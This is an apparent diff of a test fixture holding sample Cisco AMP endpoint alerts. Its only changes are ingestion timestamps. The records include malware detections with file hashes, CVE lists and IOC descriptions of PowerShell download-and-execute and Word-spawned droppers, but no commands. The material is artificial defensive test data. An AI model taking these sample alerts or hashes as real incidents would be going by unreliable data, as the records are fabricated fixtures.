Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "code": "1107296279", "kind": "alert", 
@@ -2628,7 +2628,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222567700Z", + "ingested": "2021-12-14T14:40:34.011397613Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -2699,7 +2699,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222573400Z", + "ingested": "2021-12-14T14:40:34.011398138Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -2786,7 +2786,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222579300Z", + "ingested": "2021-12-14T14:40:34.011398600Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -2866,7 +2866,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222585300Z", + "ingested": "2021-12-14T14:40:34.011399186Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2945,7 +2945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222591200Z", + "ingested": "2021-12-14T14:40:34.011399604Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3017,7 +3017,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222596900Z", + "ingested": "2021-12-14T14:40:34.011400021Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -3106,7 +3106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222602600Z", + "ingested": "2021-12-14T14:40:34.011400440Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "code": "1090519054", "kind": 
"alert", @@ -3184,7 +3184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222606800Z", + "ingested": "2021-12-14T14:40:34.011400837Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3281,7 +3281,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222611300Z", + "ingested": "2021-12-14T14:40:34.011401260Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "code": "1090519054", 
"kind": "alert", @@ -3359,7 +3359,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222616500Z", + "ingested": "2021-12-14T14:40:34.011401663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3438,7 +3438,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222621400Z", + "ingested": "2021-12-14T14:40:34.011402063Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -3525,7 +3525,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222629400Z", + "ingested": "2021-12-14T14:40:34.011402483Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -3611,7 +3611,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222635300Z", + "ingested": "2021-12-14T14:40:34.011402898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", 
@@ -3711,7 +3711,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222639700Z", + "ingested": "2021-12-14T14:40:34.011403330Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", 
